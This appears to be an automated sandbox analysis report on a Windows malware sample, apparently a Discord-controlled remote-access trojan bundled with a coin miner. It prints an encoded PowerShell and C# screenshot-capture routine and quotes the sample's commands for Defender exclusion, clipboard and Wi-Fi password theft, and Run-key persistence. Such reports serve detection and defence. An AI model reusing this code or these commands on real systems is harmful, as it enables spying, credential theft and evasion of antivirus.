JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\cscript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cscript
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\cscript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7436, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", ProcessId: 5448, ProcessName: csc.exe
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5900, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7924, ProcessName: cmd.exe
                                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", ProcessId: 7068, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Users\user\NetHood\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe, ParentProcessId: 7856, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8052, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", ProcessId: 7068, ProcessName: powershell.exe
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7320, ProcessName: svchost.exe

                                  Data Obfuscation

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7436, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", ProcessId: 5448, ProcessName: csc.exe

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 5000, ProcessName: cmd.exe
                                  No Snort rule has matched
                                  Timestamp:2024-08-01T10:57:10.753831+0200
                                  SID:2826930
                                  Source Port:49748
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:Crypto Currency Mining Activity Detected
                                  Timestamp:2024-08-01T10:58:33.850462+0200
                                  SID:2048130
                                  Source Port:49745
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:2024-08-01T10:58:09.528507+0200
                                  SID:2036289
                                  Source Port:55793
                                  Destination Port:53
                                  Protocol:UDP
                                  Classtype:Crypto Currency Mining Activity Detected
                                  Timestamp:2024-08-01T10:57:57.535717+0200
                                  SID:2048095
                                  Source Port:49745
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: 87Bym0x4Fy.exeAvira: detected
                                  Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\ProgramData\setup.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Users\user\AppData\Local\Temp\VbvGgiO8yC.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Program Files\Uninstall Information\cmd.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exeReversingLabs: Detection: 91%
                                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exeVirustotal: Detection: 58%Perma Link
                                  Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeReversingLabs: Detection: 91%
                                  Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeVirustotal: Detection: 58%Perma Link
                                  Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 71%
                                  Source: C:\Program Files\Google\Chrome\updater.exeVirustotal: Detection: 79%Perma Link
                                  Source: C:\Program Files\Uninstall Information\cmd.exeReversingLabs: Detection: 91%
                                  Source: C:\Program Files\Uninstall Information\cmd.exeVirustotal: Detection: 58%Perma Link
                                  Source: C:\ProgramData\Microsoft\based.exeReversingLabs: Detection: 51%
                                  Source: C:\ProgramData\Microsoft\based.exeVirustotal: Detection: 46%Perma Link
                                  Source: C:\ProgramData\Microsoft\hacn.exeReversingLabs: Detection: 70%
                                  Source: C:\ProgramData\Microsoft\hacn.exeVirustotal: Detection: 61%Perma Link
                                  Source: C:\ProgramData\setup.exeReversingLabs: Detection: 71%
                                  Source: C:\ProgramData\setup.exeVirustotal: Detection: 79%Perma Link
                                  Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 60%
                                  Source: C:\ProgramData\svchost.exeVirustotal: Detection: 52%Perma Link
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeReversingLabs: Detection: 57%
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeVirustotal: Detection: 50%Perma Link
                                  Source: 87Bym0x4Fy.exeVirustotal: Detection: 68%Perma Link
                                  Source: 87Bym0x4Fy.exeReversingLabs: Detection: 60%
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                  Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\hacn.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Uninstall Information\cmd.exeJoe Sandbox ML: detected
                                  Source: 87Bym0x4Fy.exeJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: 87Bym0x4Fy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Uninstall Information\cmd.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Uninstall Information\ebf1f9fa8afd6d
                                  Source: unknownHTTPS traffic detected: 162.159.130.234:443 -> 192.168.2.4:49730 version: TLS 1.2
                                  Source: 87Bym0x4Fy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb3+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 0000000D.00000000.1756787728.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, Build.exe, 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, s.exe, 00000015.00000000.1819435912.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000002.1899493574.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000003.1830651243.000000000718F000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb-F424491E3931}\InprocServer32" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF3C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: symbols\exe\Discord rat.pdbS source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
